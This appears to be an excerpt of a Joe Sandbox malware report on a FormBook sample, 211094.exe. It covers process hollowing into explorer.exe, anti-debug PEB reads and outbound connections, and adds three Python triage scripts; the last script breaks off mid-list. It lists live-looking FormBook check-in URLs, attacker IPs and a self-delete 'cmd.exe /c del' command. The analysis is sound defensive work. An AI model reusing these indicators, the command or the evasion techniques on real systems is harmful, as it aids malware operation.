      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AD99BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B749A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B369A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AEA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\211094.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
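      The `mov eax, dword ptr fs:[00000030h]` rows above are the static evidence behind the "Contains functionality to read the PEB" signature: on 32-bit Windows, fs:[30h] is the TEB field holding the PEB pointer, and anti-debug code reads it to reach BeingDebugged, NtGlobalFlag or the loader module lists. The block below is an added example, not code from the Joe Sandbox report, that reproduces this kind of check offline: a linear byte sweep for the two encodings of `mov r32, fs:[disp32]` over a code blob. The SAMPLE bytes are a constructed anti-debug stub, not bytes taken from 211094.exe.

```python
"""Linear sweep for `mov r32, fs:[disp32]` in 32-bit x86 code.

Added example, not code from the Joe Sandbox report: it reproduces the
kind of static check behind the "Contains functionality to read the PEB"
rows. SAMPLE below is a constructed stub, not bytes from 211094.exe.
"""
import struct

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# 32-bit TEB fields usually reached through the fs segment.
FS_OFFSETS = {
    0x00: "TEB.ExceptionList",
    0x18: "TEB.Self",
    0x30: "TEB.ProcessEnvironmentBlock",
}
PEB_OFFSET = 0x30


def scan_fs_reads(code: bytes):
    """Return (offset, register, disp32, label) for every fs:[disp32] read.

    Two encodings are recognised:
      64 A1 <disp32>          mov eax, fs:[disp32]   (moffs form, eax only)
      64 8B <modrm> <disp32>  mov r32, fs:[disp32]   (mod=00, rm=101)
    This is a byte sweep, not a disassembler, so it is a heuristic in the
    same sense as the sandbox signature.
    """
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != 0x64:            # FS segment-override prefix
            i += 1
            continue
        if i + 6 <= n and code[i + 1] == 0xA1:
            disp = struct.unpack_from("<I", code, i + 2)[0]
            hits.append((i, "eax", disp, FS_OFFSETS.get(disp, "")))
            i += 6
            continue
        if i + 7 <= n and code[i + 1] == 0x8B:
            modrm = code[i + 2]
            mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
            if mod == 0 and rm == 5:   # [disp32] with no base register
                disp = struct.unpack_from("<I", code, i + 3)[0]
                hits.append((i, REG32[reg], disp, FS_OFFSETS.get(disp, "")))
                i += 7
                continue
        i += 1
    return hits


def format_hit(hit):
    """Render a hit the way the report prints it."""
    _, reg, disp, _ = hit
    return f"mov {reg}, dword ptr fs:[{disp:08X}h]"


def count_peb_reads(code: bytes) -> int:
    """Number of fs:[30h] reads, i.e. what the signature counts per function."""
    return sum(1 for _, _, disp, _ in scan_fs_reads(code) if disp == PEB_OFFSET)


# Constructed stub: read PEB.BeingDebugged, then PEB.ProcessHeap, then TEB.Self.
SAMPLE = bytes.fromhex(
    "55 8b ec "               # push ebp ; mov ebp, esp
    "64 a1 30 00 00 00 "      # mov eax, fs:[30h]              -> PEB
    "0f b6 40 02 "            # movzx eax, byte ptr [eax+2]    -> PEB.BeingDebugged
    "64 8b 0d 30 00 00 00 "   # mov ecx, fs:[30h]              -> PEB
    "8b 49 18 "               # mov ecx, [ecx+18h]             -> PEB.ProcessHeap
    "64 8b 15 18 00 00 00 "   # mov edx, fs:[18h]              -> TEB.Self
    "5d c3"                   # pop ebp ; ret
)

if __name__ == "__main__":
    for hit in scan_fs_reads(SAMPLE):
        print(f"+0x{hit[0]:04X}: {format_hit(hit)}  {hit[3]}")
    print("PEB reads:", count_peb_reads(SAMPLE))
```

      Caveat: compilers emit exactly this encoding for NtCurrentPeb()/NtCurrentTeb() and the CRT touches the PEB at start-up, so a PEB read on its own is informational, which is how the report ranks it; what makes it interesting here is the combination with the hidden-thread, RDTSC and Any.run checks listed at the top of the report. The sweep only handles 32-bit code, which matches a sample running under SysWOW64; 64-bit code reaches the PEB through gs:[60h] instead.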

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exe | Network Connect: 199.79.62.169 80
      Source: C:\Windows\explorer.exe | Network Connect: 160.153.136.3 80
      Source: C:\Windows\explorer.exe | Network Connect: 34.98.99.30 80
      Source: C:\Windows\explorer.exe | Network Connect: 18.189.205.91 80
      Source: C:\Windows\explorer.exe | Network Connect: 185.230.60.102 80
      Source: C:\Windows\explorer.exe | Network Connect: 103.28.36.171 80
      Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
      Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.211 80
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\211094.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\211094.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\211094.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\user\Desktop\211094.exe | Thread register set: target process: 3440
      Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 3440
      Queues an APC in another process (thread injection)
      Source: C:\Users\user\Desktop\211094.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\user\Desktop\211094.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: B70000
      Source: C:\Users\user\Desktop\211094.exe | Process created: C:\Users\user\Desktop\211094.exe 'C:\Users\user\Desktop\211094.exe'
      Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
      Source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp, explorer.exe, 00000006.00000002.599826178.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000006.00000000.367049312.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Progman
      Source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp | Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
      Source: explorer.exe, 00000006.00000000.367049312.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
      Source: explorer.exe, 00000006.00000000.367049312.0000000000EE0000.00000002.00000001.sdmp, explorer.exe, 00000009.00000002.590193584.0000000003280000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292F7F cpuid
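      Read together, the Source rows in this section describe one process-hollowing chain: 211094.exe unmaps the image of a freshly created SysWOW64\explorer.exe at base address B70000, maps execute/read/write sections into it, sets the thread context and queues an APC, after which the injected explorer.exe makes the port-80 connections that the report attributes to a system binary. The block below is an added example, not code from the Joe Sandbox report or its tooling: a parser that turns rows in this format (a handful copied above into SAMPLE_REPORT as constructed input, including the PEB-read rows from the previous signature) into per-process PEB-read counts, an injection edge list, the set of hollowed targets and the system processes with network activity, i.e. the triage summary an analyst wants before pivoting to the memory dumps.

```python
"""Parse Joe Sandbox style 'Source: ...' signature rows into a triage summary.

Added example, not part of the original report or of Joe Sandbox. The rows
in SAMPLE_REPORT are constructed from the report above; the parser accepts
both the fused export form ('...exeNetwork Connect:') and a ' | ' separated one.
"""
import re
from collections import Counter, defaultdict

EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<event>Code function|Network Connect|Section loaded|Section unmapped|"
    r"Thread register set|Thread APC queued|Process created|Process token adjusted)"
    r":\s*(?P<rest>.*)$"
)
RWX = "execute and read and write"

# Constructed input: rows copied from the report, fused form as exported.
SAMPLE_REPORT = r"""
Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E5120A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\211094.exeCode function: 4_2_1E504120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04B71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\explorer.exeNetwork Connect: 199.79.62.169 80
Source: C:\Windows\explorer.exeNetwork Connect: 185.230.60.102 80
Source: C:\Users\user\Desktop\211094.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\211094.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\211094.exeThread register set: target process: 3440
Source: C:\Users\user\Desktop\211094.exeThread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\211094.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: B70000
Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\211094.exe'
"""


def parse_report(text):
    """Return (source_process, event, detail) for every row the regex understands."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append((m["src"], m["event"], m["rest"].strip()))
    return events


def summarize(events):
    """Condense parsed rows into the facts an analyst pivots on."""
    peb_reads = Counter()
    network = defaultdict(set)
    edges = []                      # (source, action, target)
    unmapped = set()                # (source, target) pairs with an image unmapped
    rwx_targets = defaultdict(set)  # source -> targets that received RWX sections
    for src, event, rest in events:
        if event == "Code function" and "fs:[00000030h]" in rest:
            peb_reads[src] += 1
        elif event == "Network Connect":
            ip, port = rest.split()
            network[src].add(f"{ip}:{port}")
        elif event == "Section loaded":
            m = re.match(r"unknown target: (?P<t>.+?\.exe) protection: (?P<p>.+)$", rest)
            if m:
                edges.append((src, f"map section ({m['p']})", m["t"]))
                if m["p"] == RWX:
                    rwx_targets[src].add(m["t"])
        elif event == "Section unmapped":
            m = re.match(r"(?P<t>.+?\.exe) base address: (?P<b>[0-9A-Fa-f]+)$", rest)
            if m:
                edges.append((src, f"unmap image at 0x{m['b']}", m["t"]))
                unmapped.add((src, m["t"]))
        elif event == "Thread register set":
            edges.append((src, "set thread context", rest.replace("target process: ", "pid ")))
        elif event == "Thread APC queued":
            edges.append((src, "queue APC", rest.replace("target process: ", "")))
        elif event == "Process created":
            edges.append((src, "create process", rest))
    # Hollowing: image unmapped in a target that also got RWX sections from the same source.
    hollowed = sorted(t for (s, t) in unmapped if t in rwx_targets[s])
    # Network activity from a binary under C:\Windows is the 'system process connects' signal.
    system_net = {p: sorted(v) for p, v in network.items()
                  if p.lower().startswith("c:\\windows\\")}
    return {
        "peb_reads": dict(peb_reads),
        "edges": edges,
        "hollowed": hollowed,
        "system_process_network": system_net,
    }


def triage(text=SAMPLE_REPORT):
    return summarize(parse_report(text))


if __name__ == "__main__":
    for key, value in triage().items():
        print(key, value)
```

      The hollowing rule deliberately requires both an unmapped image and an RWX section from the same source: a section map alone is also what a legitimate loader or a debugger does, and the unmap alone could be a failed launch, so the combination is what distinguishes the technique from noise in this kind of report.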

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match | File source: Process Memory Space: 211094.exe PID: 1872, type: MEMORY
      Source: Yara match | File source: Process Memory Space: explorer.exe PID: 776, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (5 1 2) | Virtualization/Sandbox Evasion (2 2) | OS Credential Dumping | Security Software Discovery (7 2 1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1 2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (5 1 2) | LSASS Memory | Virtualization/Sandbox Evasion (2 2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information (2) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (4) | SIM Card Swap | Carrier Billing Fraud |
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | System Information Discovery (3 1 1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

      Behavior Graph

Behavior Graph ID: 358423, Sample: 211094.exe, Startdate: 25/02/2021, Architecture: WINDOWS, Score: 100

Contacted domains at the start node: www.lvlyourlife.com; lvlyourlife.com; www.angelises.com
Signatures at the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures

Process tree (as drawn in the graph):

211094.exe 1 (started)
  Signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; 3 other signatures
  -> 211094.exe 6 (started)
     DNS/IP: googlehosted.l.googleusercontent.com 142.250.184.65, 443, 49727 GOOGLEUS United States; doc-0k-78-docs.googleusercontent.com
     Signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
     -> explorer.exe (injected)
        DNS/IP: td-balancer-dc11-60-102.wixdns.net 185.230.60.102, 49763, 80 WIX_COMIL Israel; africabiocity.com 199.79.62.169, 49760, 80 PUBLIC-DOMAIN-REGISTRYUS United States; 22 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        -> explorer.exe (started)
           Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
           -> cmd.exe 1 (started)
              -> conhost.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

Source: 211094.exe, Detection: 22%, Scanner: ReversingLabs, Label: Win32.Trojan.Vebzenpak

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

Source: 4.2.211094.exe.1e7f0000.4.unpack, Detection: 100%, Scanner: Avira, Label: TR/Crypt.XPACK.Gen
Source: 9.2.explorer.exe.b70000.2.unpack, Detection: 100%, Scanner: Avira, Label: TR/Crypt.XPACK.Gen
Source: 9.2.explorer.exe.983ea0.0.unpack, Detection: 100%, Scanner: Avira, Label: TR/Dropper.Gen
Source: 9.2.explorer.exe.4fc7960.5.unpack, Detection: 100%, Scanner: Avira, Label: TR/Dropper.Gen

      Domains

      No Antivirus matches

      URLs


      Domains and IPs

      Contacted Domains


                                                          Contacted URLs


                                                          URLs from Memory and Binaries


                                                                                Contacted IPs


                                                                                Public


                                                                                General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 358423
Start date: 25.02.2021
Start time: 15:47:19
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 211094.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/0@15/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 51% (good quality ratio 44.3%)
• Quality average: 71%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 64%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 51.11.168.160, 168.61.161.212, 104.43.193.48, 52.255.188.83, 23.211.6.115, 142.250.184.46, 2.20.142.210, 2.20.142.209, 52.155.217.156, 51.103.5.186, 20.54.26.129, 92.122.213.194, 92.122.213.247, 184.30.24.56
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, vip2-par02p.wns.notify.trafficmanager.net
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/358423/sample/211094.exe

                                                                                Simulations

                                                                                Behavior and APIs

                                                                                No simulations

                                                                                Joe Sandbox View / Context

                                                                                IPs

Match / Associated Sample Name (Detection) / Context

142.250.184.65
  UAE CONTRACT SUPPLY.exe (malicious)
18.189.205.91
  transferir copia_98087.exe (malicious)
  • www.gasexecutive.com/8zdn/?kH=hAX0XCk4QOcgLnZ0keH4mYw4W1HPTbDogNdlOttC2YdmEpNB6eRk1m0w/4WJXRKcYwe6&Bld=UVCtYPUHlPSP
  22 FEB -PROCESSING.xlsx (malicious)
  • www.okcpp.com/bw82/?GZopM=kvuD_XrpiP&RFQx_=Mfpkxl9yaS4qrCoSynoLlCSItQE/DRVdVWsqLGW7UZi4jMe9Kfon6fq0r55auVOxdeHrRA==
  IMG_01670_Scanned.doc (malicious)
  • www.kraftwater.com/mt6e/?mrj8Pz0x=0RCBTiN8QMZ3oE+VZNAduiGa6QD3EueGCqCZYSkGkB1UoSFwHRxlmL9dOF6U9iMf3iVa6g==&8pXxsd=pFN4nj8XVNlXNFt
  Drawings.xlsm (malicious)
  • www.meitubi.com/e68n/?TB=mv2NGt6wWUcKhR9O7OaEeoRJqc/bSnR4gp/SCJ8g5eZaDbcfJhkaSUPtBc2NhffZkmGD8g==&OPSLU=-Zd4llaH
185.230.60.102
  UAE CONTRACT SUPPLY.exe (malicious)
  • www.aserchofalltrades.com/w25t/?7nf0kP=UE8df8CjPA42HhSGpHRvEFW0E1qwQi3qh9I+J2DwYVAPWlwUU9Jt0Xern2mXQMt791bHr0Uusg==&wj=hBZ8sVLxwZopBdRp
  2S6VUd960E.exe (malicious)
  • www.thepoetrictedstudio.com/bw82/?JB4DY2=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&w0G=jzuDZX7xC
160.153.136.3
  RQP_10378065.exe (malicious)
  • www.thegreenlittlebuddha.com/mt6e/?rVXHzf=lnRpL0YpGPdD&mtxhc=h01RVnm9BON1opxkvERnI/Kb//o30GygCVhF9Qg5er/US/k4YrCTLYC3XqAKD1mSWelEgaOvhw==
  N5eld3tiba.exe (malicious)
  • www.somossyrup.com/dgn/?bly=Jb+2N4S8+mNqt73cosPfymzvEGa9UXukGXSCsMwZsgDHpulpyN5qTIvV4r2XGjlsVeWI&Qzr=LlyPF04H9zHd
  vB1Zux02Zf.exe (malicious)
  • www.ondemandbarbering.com/bw82/?9rn=Ch2H98AXZPNlB&jH5XY=/uLN5+r26Ut57xPIqOKXvxUOX9d2FCRa7emcxJmdJbT2O6P9vjLLh6WVqqzX35c/Z5WpvQjWxQ==
  Booking.xlsx (malicious)
  • www.jtelitetraining.com/ffw/?Op=Z6Ad&TD=pm4+eduCQwER/qZxnrPJuw4xUSDN7aZmpWq/zCgzL/Y307WdsenSSF4f4mH0J/evCd5k6w==
  0O9BJfVJi6fEMoS.exe (malicious)
  • www.buysellleasewithlisa.com/uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX
  NewOrder.xlsm (malicious)
  • www.actranslate.com/tub0/?azuxWju=9kUE4sav2/LP9TrJDc67J8k/k24+lu0rgVtnj1PSEEeZ6JBjpW2Bsvw8EuVgnFTTtvZW5g==&0dt=YtdhwPcHS
  22 FEB -PROCESSING.xlsx (malicious)
  • www.ondemandbarbering.com/bw82/?GZopM=kvuD_XrpiP&RFQx_=/uLN5+rz6Tt97hDEoOKXvxUOX9d2FCRa7e+MtK6cN7T3OLj7ozaH3+uXpMzRvYE3VPiI2g==
  AWB-INVOICE_PDF.exe (malicious)
  • www.powermindcoaching.com/idir/?jFNhC=hwkvgHy48ghmImMWzAdxmMIc2NJmaXdSmdjKS++gC1c6cUK6HyWTzvaAxwVCC50AN/AR7yL8cw==&PlHT0=_6g89p5H3xehg
  7R29qUuJef.exe (malicious)
  • www.dealsonwheeeles.com/bw82/?YliL=YNoZp1cRA6SVOqyJymFogp2JCj7FMVLhyO5okn1qVTKMcBnM1o+1nt1kFwvDwcyajWVF&RX=dn9dSBwpLLodPRy
  YSZiV5Oh2E.exe (malicious)
  • www.exlineinsurance.com/bw82/?-Zw=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp6GDrJeBiJjd&2db=X48HMfxHw
  urgent specification request.exe (malicious)
  • www.outlandsolar.com/2bg/?U8PL=7TNFGO6h+cLsCe9WqKO5KavC14kfAdNf0RXsPfpEmi107dhQEjNaTQA0ociJiRXcgv2T&RfutZJ=0V0hlT
  Shinshin Machinery.exe (malicious)
  • www.damsalon.com/gbr/?Jt7=pr7uWOYRsJDRipSc6LqHuFigeOgMzLOmyeKvzvM0wfiSvj5dfyV9gMbHr1N8izqMn2jS&EHO8qf=NJEx_TihIRV
  CMahQwuvAE.exe (malicious)
  • www.exlineinsurance.com/bw82/?CneDg=BmIsBElqWbiwomt7kqeO/+wp1eRqaF5UDtohozSbguw2D9Dle/F6SI7yp5m57Y+54uCa&Dxlpd=2dmp
  PO#652.exe (malicious)
  • www.perfectretreatswa.com/m3de/?dh0xl=h3j1g3POPHTWNx2N+jSnQO346+B5orLOTEGPtqWf6pBCWAHCTVcIhjzWzcYMkUeBNfau&BR=CvPh
  wfEePDdnmR.exe (malicious)
  • www.inspirationaltraveler.com/nins/?2d8=Mz//N96d1Ihtzlso+qSNYnkQ9jNTRICMtKfPgONg/PX+ANFGqFTibYTp9iPXBB/QQDlm&BRA0vf=YV8l2Jn0
  po.exe (malicious)
  • www.navedeserti.com/wtb/?DxoHn=2daDG&tdcxfR=iJn2qUWcrX+THt7ztONDVSw154pCm/e/819yFFsTHK2bt8EdJNnlyFdDUp8nT/PlIn8N
  Details!!.exe (malicious)
  • www.christiandailyusa.com/t052/?Txlp=DVgTZPS8Krg0RZ&al88_FR8=prdv1VbO4ZDHQQDUocIIxOCDVaUGE+sUaaTmxsuBezDKZQ10clVSR+BHlmembIIHOWLX
  AANK5mcsUZ.exe (malicious)
  • www.concordhomeevaluation.com/da0a/?EjY=dhrdFxjxtJ0&1bz=uHvI5XDJRRwa0e/jvHGHCOuwedukss94ZBLyrjL/W13bRufq2/ti6Aznlr12+W//4IHP
  PvvkzXgMjG.exe (malicious)
  • www.outlandsolar.com/gzcj/?zn=JUZKXajlNXjpQYlDvuULx9hFkGkc6cgVjrKumN4gZ4Gr+v3bF1Kxf6NoT7+UFLOkUugDfVPosw==&SP=DjfD_VNP4PYp
  tXoqs48Ta9.rtf (malicious)
  • www.advancedcaremedical.com/c239/?XR-p=zpv5YNWkyED4aJQT1xTIqe2DeNtx0w0G3KSLnaFCQFJ0w1SlmGrhhCPhUjNVyp2kxjsvXw==&LN9xg=7nG07PO0Dbw8PFL
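The context URLs above all have the same shape: one short directory under the host, then a query string with exactly two parameters, one of which is a long base64-like blob and the other a short identifier. That shape is characteristic of FormBook check-in traffic, which is why one path token (for example bw82 or mt6e) recurs across unrelated-looking hosts. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses URLs of that shape and pivots on the path token so that hosts sharing a token can be grouped for hunting. The input list is copied from the table above, the shape test is a heuristic chosen for this example (the thresholds are assumptions, not values from the report), and the benign URL is constructed.

```python
"""Pivot on FormBook-style check-in URLs from a sandbox context table.

Added example, not part of the Joe Sandbox report. CONTEXT_URLS are copied from
the IP context table; BENIGN_URL is constructed. The structural test in
looks_like_formbook_checkin is a heuristic chosen for this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# URLs copied from the report's IP context table.
CONTEXT_URLS = [
    "www.gasexecutive.com/8zdn/?kH=hAX0XCk4QOcgLnZ0keH4mYw4W1HPTbDogNdlOttC2YdmEpNB6eRk1m0w/4WJXRKcYwe6&Bld=UVCtYPUHlPSP",
    "www.okcpp.com/bw82/?GZopM=kvuD_XrpiP&RFQx_=Mfpkxl9yaS4qrCoSynoLlCSItQE/DRVdVWsqLGW7UZi4jMe9Kfon6fq0r55auVOxdeHrRA==",
    "www.thepoetrictedstudio.com/bw82/?JB4DY2=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&w0G=jzuDZX7xC",
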